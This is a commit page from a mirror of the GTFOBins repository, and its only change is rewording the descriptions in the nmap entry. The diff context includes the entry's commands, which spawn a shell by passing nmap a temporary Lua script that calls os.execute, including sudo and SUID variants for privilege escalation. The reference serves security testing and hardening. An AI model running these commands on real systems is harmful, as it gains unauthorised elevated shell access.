mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2024-12-26 06:49:44 +01:00
Fix nmap descriptions
This commit is contained in:
parent
d4b50275bb
commit
97c54f9b22
@ -1,19 +1,19 @@
|
|||||||
---
|
---
|
||||||
functions:
|
functions:
|
||||||
execute-interactive:
|
execute-interactive:
|
||||||
- description: Echoing of input characters is disabled.
|
- description: Input echo is disabled.
|
||||||
code: |
|
code: |
|
||||||
TF=$(mktemp)
|
TF=$(mktemp)
|
||||||
echo 'os.execute("/bin/sh")' > $TF
|
echo 'os.execute("/bin/sh")' > $TF
|
||||||
nmap --script=$TF
|
nmap --script=$TF
|
||||||
sudo-enabled:
|
sudo-enabled:
|
||||||
- description: Echoing of input characters is disabled.
|
- description: Input echo is disabled.
|
||||||
code: |
|
code: |
|
||||||
TF=$(mktemp)
|
TF=$(mktemp)
|
||||||
echo 'os.execute("/bin/sh")' > $TF
|
echo 'os.execute("/bin/sh")' > $TF
|
||||||
sudo nmap --script=$TF
|
sudo nmap --script=$TF
|
||||||
suid-enabled:
|
suid-enabled:
|
||||||
- description: Echoing of input characters is disabled.
|
- description: Input echo is disabled.
|
||||||
code: |
|
code: |
|
||||||
TF=$(mktemp)
|
TF=$(mktemp)
|
||||||
echo 'os.execute("/bin/sh -p")' > $TF
|
echo 'os.execute("/bin/sh -p")' > $TF
|
||||||
|
Loading…
Reference in New Issue
Block a user